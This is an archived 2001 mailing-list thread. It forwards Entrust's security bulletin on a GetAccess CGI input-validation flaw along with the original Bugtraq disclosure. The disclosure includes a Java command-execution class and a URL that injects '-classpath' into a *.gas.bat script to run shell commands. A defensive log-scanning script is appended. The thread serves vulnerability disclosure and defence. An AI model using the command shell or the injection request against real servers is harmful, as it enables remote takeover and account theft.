FW: Entrust - getAccess

From: MARTAK,PAVEL (HP-Czechia,ex1) (pavel_martakat_private)
Date: Wed Aug 01 2001 - 00:04:10 PDT


    I did not see Entrust's answer posted to bugtraq, so I'm sending it.
    Pavel M.
    -----Original Message-----
    From: GetAccess Support [mailto:getaccess.supportat_private]
    Sent: 30 July 2001 16:37
    To: 'MARTAK,PAVEL (HP-Czechia,ex1)'
    Subject: RE: Entrust - getAccess
    
    
    Good morning Pavel. 
    I've included the press release and patch details below. Please let me know
    if you need clarification. 
    Sincerely, 
    Jeff 
    Entrust Security Bulletin  E01-001 
    ================================== 
    Subject: Entrust GetAccess(tm) CGI Script Vulnerability 
    Originally posted: July 27, 2001 
    Summary 
    ======= 
    An internet newsgroup posting on BUGTRAQ has identified a vulnerability in
    Entrust GetAccess that could allow unauthorized execution of Java programs
    installed on GetAccess web servers. This vulnerability has been confirmed by
    Entrust and a patch is forthcoming. 
    Detailed information on this issue has been posted to the Entrust customer
    extranet on both the Entrust GetAccess Portal
    (https://login.encommerce.com/private/docs/techSupport/Patches-BugFix/e01-001.html)
    and the Entrust Customer Support Extranet
    (https://www.entrust.com/support/resources/recentsecuritynotes.htm).
    If you have trouble reaching the portals, please call: within North America
    877-754-7878, elsewhere 613-270-3700.  A hotline has been established for
    the weekend of July 28th/29th, at +1 613 220 8357.
    Affected Software Versions 
    ========================== 
     - Entrust GetAccess, all versions and platforms 
     - Specifically, servers running the Access Service, administration
    application, or runtimes. 
    Patch Availability 
    ================== 
    Patches for this vulnerability will be posted to the Entrust customer
    support extranet on or before Sunday, July 29th 2001.
    ================== 
    (c) Entrust Inc. 2001 
    Jeff McGrath 
    Web Security Team 
    getAccess Integration 
    Entrust, Inc. 
    "Securing the Internet" 
    Customer Support Phone: 1 877 PKI SUPT 
    mailto:supportat_private 
    http://www.entrust.com 
    
    
    
    -----Original Message----- 
    From: MARTAK,PAVEL (HP-Czechia,ex1) [mailto:pavel_martakat_private] 
    Sent: Monday, July 30, 2001 2:51 AM 
    To: supportat_private 
    Subject: FW: Entrust - getAccess 
    
    
    This was announced in BUGTRAQ. 
    PavelM 
    -----Original Message----- 
    From: rudi carell [mailto:rudicarellat_private] 
    Sent: 27 July 2001 13:34
    To: BUGTRAQat_private 
    Subject: Entrust - getAccess 
    
    
    
    hola friends, 
    getAccess[tm] is used as a single-sign-on system often used for large 
    internet-portals. 
    --- snip (http://www.entrust.com) --- 
    Entrust GetAccess[tm] offers the most comprehensive solution for 
    consistently deploying and enforcing 
    basic and enhanced security across online applications, from Web browsers, 
    to enterprise applications and 
    legacy database systems. 
    --- snip --- 
    problem description: 
    due to missing input-validation it is possible to run(start) java-programs 
    on the "getaccess"-machine. 
    combined with publicly accessible uploads or any other possibility to create 
    class-files on the server this vulnerability could be used to run arbitrary 
    system commands on the target machine( or change getAccess parameters and 
    steal any user account you want BTW). 
    it should also be possible(but not proven yet) to exploit default-,install- 
    or demo classes within Java or getAccess which would make the 
    file-upload(creation) part unneeded! 
    (uninstall.class is very likely an effective DOS) 
    
    
    Example: 
    find exploitable getAccess-class(one which accepts params!) or upload a 
    "command" program: 
    --- cut here (example cmd.java) --- 
    import java.io.*; 

    public class cmd { 
        public static void main(String args[]) { 
            String s = null;  // line buffer for the child's output
            try { 
                Process p = Runtime.getRuntime().exec(args[0] + " " + args[1]); 
                BufferedReader stdInput = new BufferedReader(
                    new InputStreamReader(p.getInputStream())); 
                BufferedReader stdError = new BufferedReader(
                    new InputStreamReader(p.getErrorStream())); 
                // CGI response header, then the child's stdout and stderr
                System.out.println("Content-type: text/html\n\n"); 
                while ((s = stdInput.readLine()) != null) { System.out.println(s); } 
                while ((s = stdError.readLine()) != null) { System.out.println(s); } 
                System.exit(0); 
            } 
            catch (IOException e) { e.printStackTrace(); System.exit(-1); } 
        } 
    } 
    --- cut here --- 
    
    
    later then .. a http-request to : 
    http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi 
    .. will run "/whereever/cmd.class" and execute "/bin/ls -alsi" 
    
    
    Summary: 
    object: *.gas.bat  (all the getAccess cgi-shell-scripts) 
    class: input validation 
    remote: yes 
    vendor: has been informed with a separate e-mail ( entrustat_private ) 
    
    
    (and BTW. i would NEVER EVER recommend to use shell-scripts for 
    authentication purposes!) 
    
    
    nice day, 
    
    
    rC 
    rudicarellat_private 
    securityat_private 
    http://www.freefly.com/security/ 
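
For defenders reviewing web server logs for the request shape described in the post above (extra path info after a `*.gas.bat` script that decodes to whitespace or option-like tokens), here is a detection sketch. It is an added example, not code from the original post or from Entrust; the function names and log lines are constructed, and it assumes Common Log Format and that legitimate requests carry no such path info.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); hosts and paths are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [27/Jul/2001:13:40:01 +0200] "GET /sek-bin/login.gas.bat HTTP/1.0" 200 2310
192.0.2.10 - - [27/Jul/2001:13:40:09 +0200] "GET /sek-bin/login.gas.bat?lang=en HTTP/1.0" 200 2310
198.51.100.7 - - [27/Jul/2001:13:41:30 +0200] "GET /sek-bin/login.gas.bat/x%20-classpath%20/tmp%20Foo HTTP/1.0" 200 512
198.51.100.7 - - [27/Jul/2001:13:41:55 +0200] "GET /sek-bin/helper.gas.bat/a%09b HTTP/1.0" 200 87
192.0.2.44 - - [27/Jul/2001:13:42:10 +0200] "GET /index.html HTTP/1.0" 200 1044
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Script path ending in .gas.bat, followed by optional extra path info.
SCRIPT_RE = re.compile(
    r'^(?P<script>/[^?]*?\.gas\.bat)(?=[/?]|$)(?P<extra>/[^?]*)?', re.I)

def suspicious_path_info(raw_uri):
    """Return a list of reasons if the URI's path info looks like argument
    injection into a *.gas.bat script, else None."""
    m = SCRIPT_RE.match(raw_uri)
    if not m or not m.group("extra"):
        return None
    extra = m.group("extra")
    for _ in range(3):                 # peel nested percent-encoding (%2520)
        decoded = unquote(extra)
        if decoded == extra:
            break
        extra = decoded
    reasons = []
    if re.search(r"\s", extra):
        reasons.append("whitespace in path info")
    if re.search(r"(?:^|[\s/])-\w", extra):
        reasons.append("option-like token")
    return reasons or None

def scan(log_text):
    """Yield (client, raw URI, reasons) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        req = REQUEST_RE.search(line)
        if not req:
            continue
        reasons = suspicious_path_info(req.group(1))
        if reasons:
            hits.append((line.split()[0], req.group(1), reasons))
    return hits

if __name__ == "__main__":
    for client, uri, reasons in scan(SAMPLE_LOG):
        print(client, uri, "; ".join(reasons))
```
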
    
    
    
    
    
    
    
    
    



    This archive was generated by hypermail 2b30 : Wed Aug 01 2001 - 07:59:50 PDT